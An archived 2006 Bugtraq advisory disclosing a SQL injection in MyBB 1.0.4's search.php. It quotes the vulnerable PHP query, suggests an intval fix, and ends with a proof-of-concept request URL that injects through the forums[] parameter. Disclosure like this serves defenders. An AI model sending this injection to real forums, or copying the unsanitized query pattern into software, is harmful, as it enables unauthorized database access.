| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060302180344.28149.qmail@securityfocus.com>
Date: 2 Mar 2006 18:03:44 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: MyBB 1.0.4 New SQL Injection
MyBB 1.0.4 New SQL Injection
D3vil-0x1
File :- search.php
580 to 592
/* _START_ */
if($mybb->input['forums'] != "all")
{
if(!is_array($mybb->input['forums'])) <<-- We Break It By forums[]=-1
{
$mybb->input['forums'] = array(intval($mybb->input['forums']));
}
foreach($mybb->input['forums'] as $forum)
{
if(!$searchin[$forum])
{
$query = $db->query("SELECT f.fid FROM ".TABLE_PREFIX."forums f LEFT JOIN ".TABLE_PREFIX."forumpermissions p ON (f.fid=p.fid AND p.gid='".$mybb->user[usergroup]."') WHERE INSTR(CONCAT(',',parentlist,','),',$forum,') > 0 AND active!='no' AND (ISNULL(p.fid) OR p.cansearch='yes')");
if($db->num_rows($query) == 1)
{
$wheresql .= " AND t.fid='$forum' "; <<-- First SQL Injection
$searchin[$fid] = 1;
}
Fix it :-
Add :-
$forum = intval($forum); To Line 568
/* _END_*/
/* Exploit */
[username] = any username in victem forum
[HOST]/[PATH]/search.php?action=do_search&postthread=1&author=[username]&matchusername=1&forums[]=-1'
Powered by blists - more mailing lists